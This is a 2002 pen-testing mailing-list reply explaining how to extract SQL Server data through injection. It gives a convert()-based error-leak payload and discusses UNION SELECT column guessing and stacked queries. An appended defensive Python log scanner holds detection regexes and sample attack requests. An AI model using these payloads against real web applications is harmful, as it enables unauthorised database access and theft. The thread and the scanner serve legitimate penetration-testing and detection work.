Re: sql injection - operand type clash

From: Kevin Spett (kspett@spidynamics.com)
Date: 03/15/02


From: "Kevin Spett" <kspett@spidynamics.com>
To: "mel" <meling@scan-associates.net>, <pen-test@securityfocus.com>
Date: Fri, 15 Mar 2002 14:45:04 -0800


> Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Operand type clash: ntext is
> incompatible with int
>
> I have tried
>
> union select username,1,1,.... (20+ columns) from table
> union select 1,username,1,1....
> union select 1,1,username,1...

Yeah, that can eat up some time.
Try using the convert() hack to get the result of your query back in an
error message. Assuming that you're dealing with a quoted vulnerability, try
this injection string:
' %2b convert(int, (SELECT TOP 1 fieldname FROM table WHERE fieldname NOT IN
('knownvalue', 'knownvalue2'))) %2b '

You should get a convert error back that includes the result of the
subquery.

> I've also tried union select convert(sql_variant,username),1,1,...

I think sql_variant only works in the most recent version of SQL Server, so
it may not even be a recognized data type.

> My second problem is that I cannot execute this:
> http://target/da.asp?userid=user' or 1=1; select * from
> information_schema.tables--

You're not likely to get the results of a stacked query in your returned
page. Stacking queries is mostly useful for executing stored procedures.

Good luck.

Kevin Spett
SPI Dynamics, Inc.
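
An added example, not part of the original message: a small log scanner a defender could use to flag the three request shapes discussed in this thread (convert() error leak, UNION SELECT column guessing, stacked queries). The log format (method, path, query, status), the rule names and the sample lines are assumptions constructed for the illustration.

```python
import re
from urllib.parse import unquote_plus

# One rule per request shape discussed in this thread (rule names are hypothetical).
RULES = {
    # convert(int, (SELECT ...)): forces a conversion error that carries query data
    "convert_error_leak": re.compile(
        r"\bconvert\s*\(\s*int\s*,\s*\(\s*select\b", re.I),
    # UNION SELECT used to guess the column count and types
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    # a second statement stacked after ';'
    "stacked_query": re.compile(
        r";\s*(?:select|exec|execute|insert|update|delete|drop)\b", re.I),
}

# Constructed sample lines, assumed format: method path query status.
SAMPLE_LOG = [
    "GET /da.asp userid=alice 200",
    "GET /da.asp userid=x'+%2b+convert(int,+(SELECT+TOP+1+fieldname+FROM+table"
    "+WHERE+fieldname+NOT+IN+('knownvalue')))+%2b+' 500",
    "GET /da.asp userid=1+union+select+1,username,1+from+table 500",
    "GET /da.asp userid=user'+or+1=1;+select+*+from+information_schema.tables-- 200",
]


def scan_line(line):
    """Return the sorted rule names matched by one log line."""
    method, path, query, status = line.split()
    # unquote_plus turns '+' into a space and '%2b' into a literal '+',
    # so the rules see the text the database would have received.
    decoded = unquote_plus(query)
    hits = [name for name, rx in RULES.items() if rx.search(decoded)]
    # A 500 on a matching request suggests the database raised an error.
    if hits and status == "500":
        hits.append("server_error")
    return sorted(hits)


def scan(lines):
    """Map 1-based line number to matched rules, skipping clean lines."""
    return {n: hits for n, line in enumerate(lines, 1) if (hits := scan_line(line))}


if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG).items():
        print(n, hits)
```

A convert_error_leak hit together with server_error is the case to triage first, since it indicates the conversion error was actually raised. Parameterized queries and a generic error page remove both the injection point and the error channel.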
